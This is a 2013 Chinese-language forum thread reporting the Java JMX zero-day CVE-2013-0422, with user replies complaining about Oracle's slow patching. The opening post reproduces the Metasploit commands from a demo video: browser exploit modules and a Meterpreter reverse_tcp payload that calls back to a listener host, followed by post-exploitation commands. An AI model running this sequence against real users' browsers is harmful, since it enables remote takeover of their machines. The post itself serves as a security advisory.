微剋多資訊

 找回密碼
 註冊

Login

Login

搜索

該用戶從未簽到

發表於 2013-1-11 17:14 | 顯示全部樓層 |閱讀模式
主題: Java Applet JMX 0-Day 遠端執行代碼 (含影片示範)

發佈日期:2013/01/10

影響版本:Oracle Java SE 7 Update 10 and bellow

漏洞編號:CVE-2013-0422

說明:
Java 又爆發漏洞@@我想這也不是一天二天的事了,Oracle 官方對安全漏洞的修補速度再遭爭議。
而這一次的漏洞,更是已經被知名駭客攻擊工具 Blackhole Exploit Kit (BHEK) 及 the Cool Exploit Kit (CEK) 所收入內建於其中,相信接下來會有更多層出不窮的Web攻擊發生。

建議:
Java SE 7 Update 8~10 有漏洞與 0-Day。
Java SE 5~6 更早就被挖出漏洞。參考:http://www.ithome.com.tw/itadm/article.php?c=76482
所以 Oracle 願意進一步更新前,暫時移除不用(有可能嗎?)或者自求多福!

其它參考網站說明:
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html

影片內指令:
use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid


From
https://www.facebook.com/netwargame

該用戶從未簽到

發表於 2013-1-11 20:00 | 顯示全部樓層
本帖最後由 divale 於 2013-1-11 20:05 編輯

呵呵~看樣子只能等歐樂可發佈修正檔了
考驗該公司對安全漏洞修補的能力

發文竟會掉字,重po了好幾次
回覆

使用道具 舉報

該用戶從未簽到

發表於 2013-1-12 00:48 | 顯示全部樓層
本帖最後由 lmam.ou 於 2013-1-12 00:57 編輯

這真的是杯具~~~
運用層面廣泛
但卻是漏洞連連~~~
Java的安全性要是沒有更好的解決方案~~~
遲早會成為歷史~~~

PS:youtube的示範影片~~~可以知道~~~"怎麼死的都不知道"!!!

回覆

使用道具 舉報

該用戶從未簽到

發表於 2013-1-12 16:37 | 顯示全部樓層
希望Oracle早日修補此漏洞
很多軟體須依考Java運作
回覆

使用道具 舉報

您需要登入後才可以回帖 登入 | 註冊

本版積分規則

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2016-12-9 04:04

Discuz! X

© 2009-2016 Microduo

快速回覆 返回頂部 返回列表